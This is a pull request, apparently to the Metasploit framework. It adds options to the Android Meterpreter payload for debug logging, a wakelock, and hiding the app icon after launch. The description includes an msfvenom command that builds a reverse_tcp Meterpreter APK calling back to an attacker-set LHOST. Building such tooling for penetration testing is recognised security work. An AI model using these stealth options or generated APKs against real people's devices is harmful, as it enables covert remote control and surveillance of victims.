### PR TITLE
Add some advanced options to the Android payload

### DIFF
--- a/lib/msf/core/payload/android.rb
+++ b/lib/msf/core/payload/android.rb
@@ -56,7 +56,12 @@ module Msf::Payload::Android
     }
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
-    config[0] = "\x01" if opts[:stageless]
+    flags = 0
+    flags |= 1 if opts[:stageless]
+    flags |= 2 if ds['AndroidMeterpreterDebug']
+    flags |= 4 if ds['AndroidWakelock']
+    flags |= 8 if ds['AndroidHideAppIcon']
+    config[0] = flags.chr
     config
   end
 

--- a/lib/msf/core/payload/android/payload_options.rb
+++ b/lib/msf/core/payload/android/payload_options.rb
@@ -1,0 +1,18 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Msf::Payload::Android::PayloadOptions
+
+  def initialize(info = {})
+    super(info)
+    register_advanced_options(
+      [
+        Msf::OptBool.new('AndroidMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]), 
+        Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload" ]), 
+        Msf::OptBool.new('AndroidHideAppIcon', [ false, "Hide the application icon automatically after launch" ]), 
+      ]
+    )
+  end
+
+end

--- a/lib/msf/core/payload/android/reverse_http.rb
+++ b/lib/msf/core/payload/android/reverse_http.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/android/payload_options'
 require 'msf/core/payload/uuid/options'
 
 module Msf
@@ -16,6 +17,7 @@ module Payload::Android::ReverseHttp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Android
+  include Msf::Payload::Android::PayloadOptions
   include Msf::Payload::UUID::Options
 
   #

--- a/lib/msf/core/payload/android/reverse_tcp.rb
+++ b/lib/msf/core/payload/android/reverse_tcp.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/android/payload_options'
 
 module Msf
 
@@ -15,6 +16,7 @@ module Payload::Android::ReverseTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Android
+  include Msf::Payload::Android::PayloadOptions
 
   #
   # Generate the transport-specific configuration


### PR DESCRIPTION
This change adds some Android options for msfvenom when generating an Android payload.

## Verification

List the steps needed to make sure this thing works

- [x] Land https://github.com/rapid7/metasploit-payloads/pull/245
- [x] `msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -o met.apk`
- [x] Install and run the APK
- [x] **Verify** the icon is hidden automatically after running

Fixes #8605